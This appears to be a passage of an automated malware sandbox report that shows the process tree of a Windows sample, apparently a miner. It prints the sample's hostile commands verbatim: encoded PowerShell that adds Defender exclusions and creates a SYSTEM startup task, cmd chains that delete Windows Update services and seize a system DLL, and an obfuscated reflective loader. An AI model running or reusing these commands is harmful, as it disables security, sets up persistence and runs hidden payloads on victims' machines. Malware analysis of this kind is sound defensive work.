Token: SeProfSingleProcessPrivilege	3864	powershell.exe
Token: SeIncBasePriorityPrivilege	3864	powershell.exe
Token: SeCreatePagefilePrivilege	3864	powershell.exe
Token: SeBackupPrivilege	3864	powershell.exe
Token: SeRestorePrivilege	3864	powershell.exe

Suspicious use of SetWindowsHookEx 3 IoCs

pid	Process
4408	Conhost.exe
4280	Conhost.exe
3124	Conhost.exe

Suspicious use of UnmapMainImage 1 IoCs

pid	Process
2564	svchost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4944 wrote to memory of 2448	4944	d4696b99aae2a8c0b6117c12181ce3b23c2b8b3f0a29d7993a968ec2dcf446f4.exe	83
PID 4944 wrote to memory of 2448	4944	d4696b99aae2a8c0b6117c12181ce3b23c2b8b3f0a29d7993a968ec2dcf446f4.exe	83
PID 4944 wrote to memory of 2448	4944	d4696b99aae2a8c0b6117c12181ce3b23c2b8b3f0a29d7993a968ec2dcf446f4.exe	83
PID 4944 wrote to memory of 2448	4944	d4696b99aae2a8c0b6117c12181ce3b23c2b8b3f0a29d7993a968ec2dcf446f4.exe	83
PID 4944 wrote to memory of 2448	4944	d4696b99aae2a8c0b6117c12181ce3b23c2b8b3f0a29d7993a968ec2dcf446f4.exe	83
PID 2448 wrote to memory of 4352	2448	AppLaunch.exe	90
PID 2448 wrote to memory of 4352	2448	AppLaunch.exe	90
PID 4352 wrote to memory of 2424	4352	Zd60uZ7J.exe	93
PID 4352 wrote to memory of 2424	4352	Zd60uZ7J.exe	93
PID 4352 wrote to memory of 2424	4352	Zd60uZ7J.exe	93
PID 2424 wrote to memory of 612	2424	conhost.exe	94
PID 2424 wrote to memory of 612	2424	conhost.exe	94
PID 2424 wrote to memory of 3620	2424	conhost.exe	96
PID 2424 wrote to memory of 3620	2424	conhost.exe	96
PID 2424 wrote to memory of 4780	2424	conhost.exe	98
PID 2424 wrote to memory of 4780	2424	conhost.exe	98
PID 3620 wrote to memory of 2656	3620	cmd.exe	101
PID 3620 wrote to memory of 2656	3620	cmd.exe	101
PID 4780 wrote to memory of 1256	4780	cmd.exe	100
PID 4780 wrote to memory of 1256	4780	cmd.exe	100
PID 2424 wrote to memory of 3864	2424	conhost.exe	102
PID 2424 wrote to memory of 3864	2424	conhost.exe	102
PID 3620 wrote to memory of 4184	3620	cmd.exe	104
PID 3620 wrote to memory of 4184	3620	cmd.exe	104
PID 4780 wrote to memory of 2192	4780	cmd.exe	105
PID 4780 wrote to memory of 2192	4780	cmd.exe	105
PID 4780 wrote to memory of 3676	4780	cmd.exe	106
PID 4780 wrote to memory of 3676	4780	cmd.exe	106
PID 3620 wrote to memory of 1904	3620	cmd.exe	107
PID 3620 wrote to memory of 1904	3620	cmd.exe	107
PID 4780 wrote to memory of 1068	4780	cmd.exe	108
PID 4780 wrote to memory of 1068	4780	cmd.exe	108
PID 3620 wrote to memory of 4584	3620	cmd.exe	109
PID 3620 wrote to memory of 4584	3620	cmd.exe	109
PID 3620 wrote to memory of 4516	3620	cmd.exe	110
PID 3620 wrote to memory of 4516	3620	cmd.exe	110
PID 3620 wrote to memory of 2032	3620	cmd.exe	111
PID 3620 wrote to memory of 2032	3620	cmd.exe	111
PID 3620 wrote to memory of 1136	3620	cmd.exe	112
PID 3620 wrote to memory of 1136	3620	cmd.exe	112
PID 3620 wrote to memory of 3992	3620	cmd.exe	113
PID 3620 wrote to memory of 3992	3620	cmd.exe	113
PID 3620 wrote to memory of 4620	3620	cmd.exe	114
PID 3620 wrote to memory of 4620	3620	cmd.exe	114
PID 3620 wrote to memory of 2500	3620	cmd.exe	115
PID 3620 wrote to memory of 2500	3620	cmd.exe	115
PID 3620 wrote to memory of 3484	3620	cmd.exe	116
PID 3620 wrote to memory of 3484	3620	cmd.exe	116
PID 3620 wrote to memory of 4964	3620	cmd.exe	117
PID 3620 wrote to memory of 4964	3620	cmd.exe	117
PID 2424 wrote to memory of 2252	2424	conhost.exe	118
PID 2424 wrote to memory of 2252	2424	conhost.exe	118
PID 2424 wrote to memory of 2252	2424	conhost.exe	118
PID 2424 wrote to memory of 3912	2424	conhost.exe	119
PID 2424 wrote to memory of 3912	2424	conhost.exe	119
PID 2424 wrote to memory of 864	2424	conhost.exe	121
PID 2424 wrote to memory of 864	2424	conhost.exe	121
PID 3912 wrote to memory of 736	3912	cmd.exe	123
PID 3912 wrote to memory of 736	3912	cmd.exe	123
PID 864 wrote to memory of 4908	864	cmd.exe	124
PID 864 wrote to memory of 4908	864	cmd.exe	124
PID 3620 wrote to memory of 3888	3620	cmd.exe	130
PID 3620 wrote to memory of 3888	3620	cmd.exe	130
PID 3620 wrote to memory of 1384	3620	cmd.exe	131

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:664

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:580
- C:\Windows\system32\dwm.exe
  "dwm.exe"
  2⤵
  PID:328
- C:\Windows\System32\dllhost.exe
  C:\Windows\System32\dllhost.exe /Processid:{4cb8499a-f52c-42b6-a4a0-d3c8f0b5d019}
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4060
- C:\Windows\SysWOW64\dllhost.exe
  C:\Windows\SysWOW64\dllhost.exe /Processid:{6aa651d5-cd5c-48bd-80b3-141f653b4a55}
  2⤵
  PID:4264

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:440

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:688

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
PID:1092
- C:\Windows\system32\taskhostw.exe
  taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
  2⤵
  PID:2436
- C:\Program Files\Platform\Defender\update.exe
  "C:\Program Files\Platform\Defender\update.exe"
  2⤵
  - Executes dropped EXE
  PID:2444
- - C:\Windows\System32\conhost.exe
    "C:\Windows\System32\conhost.exe" "C:\Program Files\Platform\Defender\update.exe"
    3⤵
    - Drops file in Drivers directory
    - Drops file in System32 directory
    - Suspicious use of SetThreadContext
    - Drops file in Program Files directory
    - Modifies data under HKEY_USERS
    PID:908
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAcQBsAHkAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBrAGQAagAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAbABhACMAPgAgAEAAKAAgADwAIwBmAGgAegAjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAZwBmAHQAaAAjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAKQAgADwAIwB5AG4AYgBlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGEAbwAjAD4A"
      4⤵
      Drops file in System32 directory
      Modifies data under HKEY_USERS
      PID:1864
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        
        PID:972
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
      4⤵
      PID:1320
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        Suspicious use of SetWindowsHookEx
        
        PID:4408
    - - C:\Windows\system32\sc.exe
        
        sc stop UsoSvc
        5⤵
        Launches sc.exe
        
        PID:3632
    - - C:\Windows\system32\sc.exe
        
        sc stop WaaSMedicSvc
        5⤵
        Launches sc.exe
        
        PID:736
    - - C:\Windows\system32\sc.exe
        
        sc stop wuauserv
        5⤵
        Launches sc.exe
        
        PID:4544
    - - C:\Windows\system32\sc.exe
        
        sc stop bits
        5⤵
        Launches sc.exe
        
        PID:4904
    - - C:\Windows\system32\sc.exe
        
        sc stop dosvc
        5⤵
        Launches sc.exe
        
        PID:4668
    - - C:\Windows\system32\reg.exe
        
        reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
        5⤵
        Modifies registry key
        
        PID:4152
    - - C:\Windows\system32\reg.exe
        
        reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
        5⤵
        Modifies registry key
        
        PID:3388
    - - C:\Windows\system32\reg.exe
        
        reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
        5⤵
        Modifies registry key
        
        PID:3712
    - - C:\Windows\system32\reg.exe
        
        reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
        5⤵
        Modifies registry key
        
        PID:4572
    - - C:\Windows\system32\reg.exe
        
        reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
        5⤵
        Modifies registry key
        
        PID:2732
    - - C:\Windows\system32\takeown.exe
        
        takeown /f C:\Windows\System32\WaaSMedicSvc.dll
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:4764
    - - C:\Windows\system32\icacls.exe
        
        icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
        5⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:4996
    - - C:\Windows\system32\reg.exe
        
        reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
        5⤵
        Modifies registry key
        
        PID:2640
    - - C:\Windows\system32\reg.exe
        
        reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
        5⤵
        Modifies registry key
        
        PID:3100
    - - C:\Windows\system32\reg.exe
        
        reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
        5⤵
        Modifies registry key
        
        PID:5088
    - - C:\Windows\system32\reg.exe
        
        reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
        5⤵
        Modifies registry key
        
        PID:2260
    - - C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
        5⤵
        
        PID:2432
    - - C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
        5⤵
        
        PID:1576
    - - C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
        5⤵
        
        PID:720
    - - C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
        5⤵
        
        PID:3500
    - - C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
        5⤵
        
        PID:2880
    - - C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
        5⤵
        
        PID:3616
    - - C:\Windows\system32\schtasks.exe
        
        SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
        5⤵
        
        PID:1332
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
      4⤵
      PID:4808
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        Suspicious use of SetWindowsHookEx
        
        PID:4280
    - - C:\Windows\system32\powercfg.exe
        
        powercfg /x -hibernate-timeout-ac 0
        5⤵
        
        PID:1684
    - - C:\Windows\system32\powercfg.exe
        
        powercfg /x -hibernate-timeout-dc 0
        5⤵
        
        PID:4908
    - - C:\Windows\system32\powercfg.exe
        
        powercfg /x -standby-timeout-ac 0
        5⤵
        
        PID:2116
    - - C:\Windows\system32\powercfg.exe
        
        powercfg /x -standby-timeout-dc 0
        5⤵
        
        PID:4164
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGgAcQBiACMAPgAgAFIAZQBnAGkAcwB0AGUAcgAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAIAAtAEEAYwB0AGkAbwBuACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAQQBjAHQAaQBvAG4AIAAtAEUAeABlAGMAdQB0AGUAIAAnACIAQwA6AFwAUAByAG8AZwByAGEAbQAgAEYAaQBsAGUAcwBcAFAAbABhAHQAZgBvAHIAbQBcAEQAZQBmAGUAbgBkAGUAcgBcAHUAcABkAGEAdABlAC4AZQB4AGUAIgAnACkAIAA8ACMAZgBwACMAPgAgAC0AVAByAGkAZwBnAGUAcgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFQAcgBpAGcAZwBlAHIAIAAtAEEAdABTAHQAYQByAHQAdQBwACkAIAA8ACMAYwBlAGkAegAjAD4AIAAtAFMAZQB0AHQAaQBuAGcAcwAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFMAZQB0AHQAaQBuAGcAcwBTAGUAdAAgAC0AQQBsAGwAbwB3AFMAdABhAHIAdABJAGYATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAGkAcwBhAGwAbABvAHcASABhAHIAZABUAGUAcgBtAGkAbgBhAHQAZQAgAC0ARABvAG4AdABTAHQAbwBwAEkAZgBHAG8AaQBuAGcATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAG8AbgB0AFMAdABvAHAATwBuAEkAZABsAGUARQBuAGQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFQAaQBtAGUATABpAG0AaQB0ACAAKABOAGUAdwAtAFQAaQBtAGUAUwBwAGEAbgAgAC0ARABhAHkAcwAgADEAMAAwADAAKQApACAAPAAjAG8AbAB5AHUAIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAFcAaQBuAGQAbwB3AHMARABlAGYAZQBuAGQAZQByACcAIAAtAFUAcwBlAHIAIAAnAFMAeQBzAHQAZQBtACcAIAAtAFIAdQBuAEwAZQB2AGUAbAAgACcASABpAGcAaABlAHMAdAAnACAALQBGAG8AcgBjAGUAIAA8ACMAdwB0AHMAaAAjAD4AOwA="
      4⤵
      Drops file in System32 directory
      Modifies data under HKEY_USERS
      PID:3104
    - - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        5⤵
        Suspicious use of SetWindowsHookEx
        
        PID:3124
  - - C:\Windows\System32\dialer.exe
      C:\Windows\System32\dialer.exe "epzggvhm"
      4⤵
      PID:3080
  - - C:\Windows\System32\dialer.exe
      C:\Windows\System32\dialer.exe zryhtmslhfgrpc1 6E3sjfZq2rJQaxvLPmXgsBL6xjjYguHWtOpZ+stIdvtFmxXu9Su4ZmZ4m248qJKzYqn0Ua9E3eZCF6KVDnl4Om3mtJYdu2zYxf5VDSOtlwzNI2HELjSSWiBbhmq9nnQLcymNaMLbX6BcVfekXBXlHwtkdZ87kGHVBeHkhms/rlEKec4HZ9wIBVrc9Qi+y2+a3lep8HRZlmoXu5C0nH5vK2Z6XqFAlqh1P1TH9zlUlrSoi8iC8XAKUbdPgbva/qi9DzYr1RVc8QqRoXX8h4GvBaNJoiMytDP1XZ+7BxVOZddNH0XJdiGTlhqmJ6roc2xDtAY0xSKzjDUzaj6VcQ6dE4nGnXfnrH194gWO2Fle+qlRtL5DmSlHKlQNVMEwD+lLyH/56tXiuxnzEBOxWLJZa4aP8Qv/WXczd4ddilDeMPY13j7jZPu5TdLr9XBYda4edqFELpOQYd1Sl2t6HN/f/knReR0toj+9pfBIu/dyltFHYBgH8jIh3ZIp8xo/NopF9P+/CLEQGN4MNrl3tzSKPM88s7KlDiFV5IVDt9y2BSrs52V/tpdfNJYjkFjol69J
      4⤵
      Executes dropped EXE
      PID:1496
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  PID:3516
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Drops file in System32 directory
  - Suspicious use of SetThreadContext
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  PID:1140
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4228

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1336

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3436

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4748

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p
1⤵
PID:5068

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:5096

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:960

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
PID:4656

C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
1⤵
PID:5044

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:4324

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -s W32Time
1⤵
PID:2836

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:1612

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:2168

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:4164
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 4164 -s 464
  2⤵
  - Program crash
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: EnumeratesProcesses
  PID:4668

C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
1⤵
PID:3748

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
1⤵
PID:3276
- C:\Windows\system32\WerFault.exe
  C:\Windows\system32\WerFault.exe -u -p 3276 -s 880
  2⤵
  - Program crash
  - Checks processor information in registry
  - Enumerates system info in registry
  - Suspicious behavior: EnumeratesProcesses
  PID:2160

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3092

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3048
- C:\Users\Admin\AppData\Local\Temp\d4696b99aae2a8c0b6117c12181ce3b23c2b8b3f0a29d7993a968ec2dcf446f4.exe
  "C:\Users\Admin\AppData\Local\Temp\d4696b99aae2a8c0b6117c12181ce3b23c2b8b3f0a29d7993a968ec2dcf446f4.exe"
  2⤵
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID:4944
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
    3⤵
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:2448
  - - C:\Users\Admin\AppData\Roaming\Zd60uZ7J.exe
      "C:\Users\Admin\AppData\Roaming\Zd60uZ7J.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:4352
    - - C:\Windows\System32\conhost.exe
        
        "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Roaming\Zd60uZ7J.exe"
        5⤵
        Drops file in Drivers directory
        Suspicious use of SetThreadContext
        Drops file in Program Files directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:2424
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGcAcQBsAHkAIwA+ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgADwAIwBrAGQAagAjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAbABhACMAPgAgAEAAKAAgADwAIwBmAGgAegAjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAZwBmAHQAaAAjAD4AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBGAGkAbABlAHMAKQAgADwAIwB5AG4AYgBlACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGEAbwAjAD4A"
        6⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:612
      - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:3620
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:3472
        
        C:\Windows\system32\sc.exe
        
        sc stop UsoSvc
        7⤵
        Launches sc.exe
        
        PID:2656
        
        C:\Windows\system32\sc.exe
        
        sc stop WaaSMedicSvc
        7⤵
        Launches sc.exe
        
        PID:4184
        
        C:\Windows\system32\sc.exe
        
        sc stop wuauserv
        7⤵
        Launches sc.exe
        
        PID:1904
        
        C:\Windows\system32\sc.exe
        
        sc stop bits
        7⤵
        Launches sc.exe
        
        PID:4584
        
        C:\Windows\system32\sc.exe
        
        sc stop dosvc
        7⤵
        Launches sc.exe
        
        PID:4516
        
        C:\Windows\system32\reg.exe
        
        reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
        7⤵
        Modifies registry key
        
        PID:2032
        
        C:\Windows\system32\reg.exe
        
        reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
        7⤵
        Modifies registry key
        
        PID:1136
        
        C:\Windows\system32\reg.exe
        
        reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
        7⤵
        Modifies security service
        Modifies registry key
        
        PID:3992
        
        C:\Windows\system32\reg.exe
        
        reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
        7⤵
        Modifies registry key
        
        PID:4620
        
        C:\Windows\system32\reg.exe
        
        reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
        7⤵
        Modifies registry key
        
        PID:2500
        
        C:\Windows\system32\takeown.exe
        
        takeown /f C:\Windows\System32\WaaSMedicSvc.dll
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
